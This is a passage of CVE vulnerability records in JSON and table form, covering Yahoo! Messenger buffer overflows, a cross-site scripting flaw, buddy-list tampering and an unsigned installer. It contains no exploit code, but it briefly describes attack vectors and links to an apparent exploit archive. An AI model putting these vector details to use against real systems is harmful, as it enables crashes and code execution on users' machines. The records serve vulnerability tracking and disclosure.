"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of \"%\" (percent) characters after the Yahoo ID."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20031026 Buffer Overflow in Yahoo messenger Client",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/342472"
},
{
"name": "8894",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/8894"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2003-1135",
"datePublished": "2005-05-10T04:00:00Z",
"dateReserved": "2005-05-04T00:00:00Z",
"dateUpdated": "2024-09-16T16:38:22.110Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2006-4975 (GCVE-0-2006-4975)
Vulnerability from cvelistv5
Published
2006-09-25 01:00
Modified
2024-08-07 19:32
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service.
References
| ▼ | URL | Tags |
|---|---|---|
| http://securityreason.com/securityalert/1626 | third-party-advisory, x_refsource_SREASON | |
| http://www.securityfocus.com/archive/1/446414/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://advisories.echo.or.id/adv/adv47-theday-2006.txt | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T19:32:22.820Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1626",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/1626"
},
{
"name": "20060917 [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-09-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-17T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1626",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/1626"
},
{
"name": "20060917 [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-4975",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1626",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/1626"
},
{
"name": "20060917 [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
},
{
"name": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt",
"refsource": "MISC",
"url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-4975",
"datePublished": "2006-09-25T01:00:00",
"dateReserved": "2006-09-24T00:00:00",
"dateUpdated": "2024-08-07T19:32:22.820Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-1665 (GCVE-0-2002-1665)
Vulnerability from cvelistv5
Published
2005-05-28 04:00
Modified
2024-08-08 03:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.cert.org/advisories/CA-2002-16.html | third-party-advisory, x_refsource_CERT | |
| http://marc.info/?l=bugtraq&m=101439616623230&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.kb.cert.org/vuls/id/755755 | third-party-advisory, x_refsource_CERT-VN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:34:55.665Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT",
"x_transferred"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#755755",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/755755"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-02-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#755755",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/755755"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-1665",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "CA-2002-16",
"refsource": "CERT",
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#755755",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/755755"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-1665",
"datePublished": "2005-05-28T04:00:00",
"dateReserved": "2005-05-28T00:00:00",
"dateUpdated": "2024-08-08T03:34:55.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-1664 (GCVE-0-2002-1664)
Vulnerability from cvelistv5
Published
2005-05-28 04:00
Modified
2024-08-08 03:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user's buddy list and possibly obtain sensitive information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.cert.org/advisories/CA-2002-16.html | third-party-advisory, x_refsource_CERT | |
| http://marc.info/?l=bugtraq&m=101439616623230&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.kb.cert.org/vuls/id/393195 | third-party-advisory, x_refsource_CERT-VN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:34:55.719Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT",
"x_transferred"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#393195",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/393195"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-02-21T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user\u0027s buddy list and possibly obtain sensitive information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "CA-2002-16",
"tags": [
"third-party-advisory",
"x_refsource_CERT"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#393195",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/393195"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-1664",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user\u0027s buddy list and possibly obtain sensitive information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "CA-2002-16",
"refsource": "CERT",
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"name": "20020221 Remote crashes in Yahoo messenger",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"name": "VU#393195",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/393195"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-1664",
"datePublished": "2005-05-28T04:00:00",
"dateReserved": "2005-05-28T00:00:00",
"dateUpdated": "2024-08-08T03:34:55.719Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4515 (GCVE-0-2007-4515)
Vulnerability from cvelistv5
Published
2007-08-31 22:00
Modified
2024-08-07 15:01
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://osvdb.org/37739 | vdb-entry, x_refsource_OSVDB | |
| http://secunia.com/advisories/26579 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/36363 | vdb-entry, x_refsource_XF | |
| http://messenger.yahoo.com/security_update.php?id=082907 | x_refsource_CONFIRM | |
| http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591 | third-party-advisory, x_refsource_IDEFENSE | |
| http://securityreason.com/securityalert/3083 | third-party-advisory, x_refsource_SREASON | |
| http://securitytracker.com/id?1018628 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/25494 | vdb-entry, x_refsource_BID | |
| http://www.vupen.com/english/advisories/2007/3011 | vdb-entry, x_refsource_VUPEN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:01:09.859Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "37739",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-08-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "37739",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4515",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "37739",
"refsource": "OSVDB",
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=082907",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4515",
"datePublished": "2007-08-31T22:00:00",
"dateReserved": "2007-08-23T00:00:00",
"dateUpdated": "2024-08-07T15:01:09.859Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4391 (GCVE-0-2007-4391)
Vulnerability from cvelistv5
Published
2007-08-17 22:00
Modified
2024-08-07 14:53
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.vupen.com/english/advisories/2007/2917 | vdb-entry, x_refsource_VUPEN | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/36115 | vdb-entry, x_refsource_XF | |
| http://www.kb.cert.org/vuls/id/515968 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/ | x_refsource_MISC | |
| http://www.team509.com/expyahoo.rar | x_refsource_MISC | |
| http://secunia.com/advisories/26501 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/bid/25330 | vdb-entry, x_refsource_BID | |
| http://osvdb.org/38221 | vdb-entry, x_refsource_OSVDB | |
| http://www.securitytracker.com/id?1018586 | vdb-entry, x_refsource_SECTRACK | |
| https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=64639&page=1#entry321749 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:53:55.679Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2917",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018586"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-08-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2917",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018586"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4391",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2917",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"name": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/",
"refsource": "MISC",
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"name": "http://www.team509.com/expyahoo.rar",
"refsource": "MISC",
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"refsource": "OSVDB",
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018586"
},
{
"name": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749",
"refsource": "MISC",
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4391",
"datePublished": "2007-08-17T22:00:00",
"dateReserved": "2007-08-17T00:00:00",
"dateUpdated": "2024-08-07T14:53:55.679Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2361 (GCVE-0-2002-2361)
Vulnerability from cvelistv5
Published
2007-10-29 19:00
Modified
2024-09-17 01:20
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.iss.net/security_center/static/9984.php | vdb-entry, x_refsource_XF | |
| http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html | mailing-list, x_refsource_BUGTRAQ | |
